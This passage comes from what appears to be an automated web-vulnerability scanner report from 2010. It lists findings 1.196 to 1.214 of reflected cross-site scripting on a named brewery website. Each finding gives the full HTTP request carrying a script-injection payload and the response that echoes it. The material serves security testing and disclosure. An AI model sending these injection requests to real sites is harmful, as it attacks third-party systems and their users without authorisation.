
       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content491d9"><script>alert(1)</script>1368f5426b7/css/print.css" method="post">
...[SNIP]...

1.196. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3975"><script>alert(1)</script>25a1ae6dfbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/cssa3975"><script>alert(1)</script>25a1ae6dfbb/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/cssa3975"><script>alert(1)</script>25a1ae6dfbb/print.css" method="post">
...[SNIP]...

1.197. http://www.ninkasibrewing.com/contact/content/css/print.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aad60"><script>alert(1)</script>24a7647a021 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/print.cssaad60"><script>alert(1)</script>24a7647a021 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/print.cssaad60"><script>alert(1)</script>24a7647a021" method="post">
...[SNIP]...

1.198. http://www.ninkasibrewing.com/contact/content/css/print.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/css/print.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930c6"><script>alert(1)</script>3fba331014d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/css/print.css?930c6"><script>alert(1)</script>3fba331014d=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:49:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/css/print.css?930c6"><script>alert(1)</script>3fba331014d=1" method="post">
...[SNIP]...

1.199. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3dd3"><a>cd8ecc31aad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contacta3dd3"><a>cd8ecc31aad/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contacta3dd3"><a>cd8ecc31aad_page" class="contacta3dd3">
...[SNIP]...

1.200. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1adf7"><script>alert(1)</script>54796ec5c3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content1adf7"><script>alert(1)</script>54796ec5c3d/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content1adf7"><script>alert(1)</script>54796ec5c3d/js/basic.js" method="post">
...[SNIP]...

1.201. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9463"><script>alert(1)</script>0cdb8fc9cbc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/jsb9463"><script>alert(1)</script>0cdb8fc9cbc/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/jsb9463"><script>alert(1)</script>0cdb8fc9cbc/basic.js" method="post">
...[SNIP]...

1.202. http://www.ninkasibrewing.com/contact/content/js/basic.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b208"><script>alert(1)</script>e00028e101d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/basic.js9b208"><script>alert(1)</script>e00028e101d HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/basic.js9b208"><script>alert(1)</script>e00028e101d" method="post">
...[SNIP]...

1.203. http://www.ninkasibrewing.com/contact/content/js/basic.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/basic.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 407cb"><script>alert(1)</script>31b20d5279f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/basic.js?407cb"><script>alert(1)</script>31b20d5279f=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/basic.js?407cb"><script>alert(1)</script>31b20d5279f=1" method="post">
...[SNIP]...

1.204. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17c1c"><a>a8cde8ac9b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contact17c1c"><a>a8cde8ac9b3/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contact17c1c"><a>a8cde8ac9b3_page" class="contact17c1c">
...[SNIP]...

1.205. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb4b5"><script>alert(1)</script>1a875df3c26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/contentcb4b5"><script>alert(1)</script>1a875df3c26/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/contentcb4b5"><script>alert(1)</script>1a875df3c26/js/combined.css" method="post">
...[SNIP]...

1.206. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3d1"><script>alert(1)</script>ecfeb04c9eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/jsbc3d1"><script>alert(1)</script>ecfeb04c9eb/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/jsbc3d1"><script>alert(1)</script>ecfeb04c9eb/combined.css" method="post">
...[SNIP]...

1.207. http://www.ninkasibrewing.com/contact/content/js/combined.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d476b"><script>alert(1)</script>a689b0522a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.cssd476b"><script>alert(1)</script>a689b0522a2 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.cssd476b"><script>alert(1)</script>a689b0522a2" method="post">
...[SNIP]...

1.208. http://www.ninkasibrewing.com/contact/content/js/combined.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71815"><script>alert(1)</script>1eba9a79caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.css?71815"><script>alert(1)</script>1eba9a79caa=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.css?71815"><script>alert(1)</script>1eba9a79caa=1" method="post">
...[SNIP]...

1.209. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5da"><a>6d080ef4815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contactbb5da"><a>6d080ef4815/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contactbb5da"><a>6d080ef4815_page" class="contactbb5da">
...[SNIP]...

1.210. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350e"><script>alert(1)</script>c3cd6c52bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content7350e"><script>alert(1)</script>c3cd6c52bb9/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content7350e"><script>alert(1)</script>c3cd6c52bb9/js/combined.js" method="post">
...[SNIP]...

1.211. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e7c2"><script>alert(1)</script>abe7c99ab4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js4e7c2"><script>alert(1)</script>abe7c99ab4e/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js4e7c2"><script>alert(1)</script>abe7c99ab4e/combined.js" method="post">
...[SNIP]...

1.212. http://www.ninkasibrewing.com/contact/content/js/combined.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20af2"><script>alert(1)</script>da4e655317a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.js20af2"><script>alert(1)</script>da4e655317a HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.js20af2"><script>alert(1)</script>da4e655317a" method="post">
...[SNIP]...

1.213. http://www.ninkasibrewing.com/contact/content/js/combined.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ninkasibrewing.com
Path:   /contact/content/js/combined.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dfc"><script>alert(1)</script>1139d382123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/content/js/combined.js?68dfc"><script>alert(1)</script>1139d382123=1 HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:50:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<form class="form" id="contact_form" action="http://www.ninkasibrewing.com/contact/content/js/combined.js?68dfc"><script>alert(1)</script>1139d382123=1" method="post">
...[SNIP]...

1.214. http://www.ninkasibrewing.com/content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b52"><a>dca3b514689 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

